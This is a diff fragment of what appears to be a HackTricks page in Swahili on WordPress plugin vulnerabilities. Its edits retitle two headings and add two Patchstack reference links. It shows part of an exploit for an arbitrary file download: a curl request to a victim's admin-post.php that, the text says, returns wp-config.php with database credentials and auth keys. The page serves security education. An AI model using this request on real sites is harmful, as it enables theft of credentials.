`$file_name` ni attacker-controlled na imeunganishwa **bila kusafishwa**. Tena, kizuizi pekee ni **CSRF nonce** ambayo inaweza kupatikana kwenye ukurasa wa resume.
|
||||
|
||||
#### Utekelezaji wa shambulio
|
||||
#### Exploitation
|
||||
```bash
|
||||
curl -G https://victim.com/wp-admin/admin-post.php \
|
||||
--data-urlencode 'task=downloadcustomfile' \
|
||||
@ -653,7 +703,7 @@ curl -G https://victim.com/wp-admin/admin-post.php \
|
||||
```
|
||||
Seva inajibu na yaliyomo ya `wp-config.php`, leaking DB credentials and auth keys.
|
||||
|
||||
## Marejeo
|
||||
## Marejeleo
|
||||
|
||||
- [Unauthenticated Arbitrary File Deletion Vulnerability in Litho Theme](https://patchstack.com/articles/unauthenticated-arbitrary-file-delete-vulnerability-in-litho-the/)
|
||||
- [Multiple Critical Vulnerabilities Patched in WP Job Portal Plugin](https://patchstack.com/articles/multiple-critical-vulnerabilities-patched-in-wp-job-portal-plugin/)
|
||||
@ -662,5 +712,7 @@ Seva inajibu na yaliyomo ya `wp-config.php`, leaking DB credentials and auth key
|
||||
- [Hosting security tested: 87.8% of vulnerability exploits bypassed hosting defenses](https://patchstack.com/articles/hosting-security-tested-87-percent-of-vulnerability-exploits-bypassed-hosting-defenses/)
|
||||
- [WooCommerce Payments ≤ 5.6.1 – Unauth privilege escalation via trusted header (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/woocommerce-payments/vulnerability/wordpress-woocommerce-payments-plugin-5-6-1-unauthenticated-privilege-escalation-vulnerability)
|
||||
- [Hackers exploiting critical WordPress WooCommerce Payments bug](https://www.bleepingcomputer.com/news/security/hackers-exploiting-critical-wordpress-woocommerce-payments-bug/)
|
||||
- [Unpatched Privilege Escalation in Service Finder Bookings Plugin](https://patchstack.com/articles/unpatched-privilege-escalation-in-service-finder-bookings-plugin/)
|
||||
- [Service Finder Bookings privilege escalation – Patchstack DB entry](https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-booking-6-0-privilege-escalation-vulnerability)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user